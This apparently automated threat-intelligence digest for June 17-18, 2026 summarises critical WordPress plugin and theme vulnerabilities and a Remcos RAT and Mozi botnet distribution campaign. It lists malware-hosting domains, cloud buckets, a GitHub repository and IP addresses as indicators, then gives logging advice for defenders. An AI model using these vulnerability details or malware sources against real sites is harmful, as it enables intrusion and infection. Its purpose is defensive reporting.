This 48-hour period (June 17-18, 2026) saw significant malicious activity centered on Remcos RAT distribution and widespread WordPress vulnerabilities. The threat landscape is dominated by 30 newly disclosed NVD vulnerabilities, including four critical-severity flaws (CVSS 9.8-10.0) affecting WordPress plugins. Three vulnerabilities enable unauthenticated arbitrary file upload and PHP object injection, providing immediate remote code execution pathways. Additionally, 50 malicious URLs were identified distributing Remcos RAT and Mozi botnet malware, with threat actors heavily leveraging Cloudflare Workers infrastructure and URL shortening services for command-and-control operations.
WordPress environments face exceptional risk due to multiple unauthenticated local file inclusion (LFI) vulnerabilities across 20+ themes and plugins, all rated HIGH severity (CVSS 8.1). Organizations running affected versions should prioritize immediate patching, as these vulnerabilities require no authentication and can lead to sensitive data exposure. The Remcos RAT campaign demonstrates continued reliance on social engineering and compromised legitimate infrastructure, including GitHub repositories and file-sharing services. Defenders should enhance monitoring of Windows event logs for suspicious process execution and file system activity, as highlighted in current DFIR best practices.
Four critical-severity vulnerabilities and 26 high-severity flaws affecting WordPress plugins and themes pose immediate exploitation risk
Unauthenticated arbitrary file upload vulnerability in WordPress & WooCommerce Scraper Plugin (<=1.0.7) allows attackers to upload malicious files and achieve remote code execution without authentication.
Subscriber-level accounts can upload arbitrary files in PT Luxa Addons (<=1.2.2), enabling authenticated users with low privileges to execute malicious code.
Unauthenticated PHP object injection in SeaFood Company theme (<=1.4) allows remote attackers to execute arbitrary code through deserialization of untrusted data.
Unauthenticated PHP object injection vulnerability in Hot Coffee theme (<=1.7) enables remote code execution through insecure deserialization.
Subscriber-level SQL injection in Events Schedule WordPress Calendar Plugin (<=2.7.2) allows authenticated users to extract sensitive database information.
Subscriber accounts can escalate privileges to administrator in Genemy theme (<=1.6.6), enabling full site compromise by low-privileged users.
20+ WordPress themes and plugins affected by unauthenticated LFI vulnerabilities (CVSS 8.1), enabling attackers to read sensitive files including wp-config.php and potentially achieve remote code execution through log poisoning.
Widespread Remcos RAT malware distribution via compromised infrastructure, Cloudflare Workers, and URL shortening services
45+ malicious URLs identified delivering Remcos RAT through Cloudflare Workers domains (guilherme-telecomunicacoes2024.workers.dev, fsocietyandtools.workers.dev, yasminanthonyy.workers.dev), indicating abuse of legitimate CDN infrastructure for C2 operations.
Multiple URL shortening services (as.al, masuk.to, cuth.me, lemon-kutt) used to obfuscate Remcos RAT delivery, likely part of phishing or malvertising campaigns targeting enterprise users.
Remcos malware samples hosted on GitHub repository (bhh545578-lab/asasasas), file-sharing service (filesco.lovestoblog.com), and compromised business website (acmgrupo.com), demonstrating threat actor adaptation to blend with legitimate traffic.
Three URLs distributing Mozi botnet malware (32-bit ELF MIPS binaries) from IP addresses 42.7.7.87 and 42.59.239.160, indicating continued targeting of routers and IoT devices for DDoS botnet recruitment.
Three URLs associated with ClearFake malware distribution using domains designed to impersonate legitimate update prompts, targeting users with fake browser update social engineering.
Threat actors increasingly leveraging legitimate cloud services and CDN infrastructure for malware distribution and C2 operations
Threat actors extensively abusing Cloudflare Workers serverless platform to host malware payloads, leveraging trusted domain reputation and global CDN for resilient distribution. Over 30 worker subdomains identified in this campaign.
Cloudflare R2 storage buckets (pub-14b7818eeed2473fb453a2385620ceb9.r2.dev, pub-ce54f1982e42425c94a1dd345decfbb9.r2.dev) hosting Remcos RAT payloads, demonstrating adversary exploitation of cloud object storage services.
IP address 66.63.170.33 hosting multiple Remcos RAT payloads and HTA files for initial access, with minimal infrastructure footprint suggesting potential compromise of legitimate hosting.
Windows event logging configuration critical for detecting and investigating modern attacks
New guidance emphasizes proper Windows event log configuration as fundamental requirement for effective DFIR operations. Organizations should ensure comprehensive logging of process creation (Event ID 4688), PowerShell activity (Event IDs 4103/4104), and file system activity to detect WordPress exploitation, Remcos RAT execution, and lateral movement.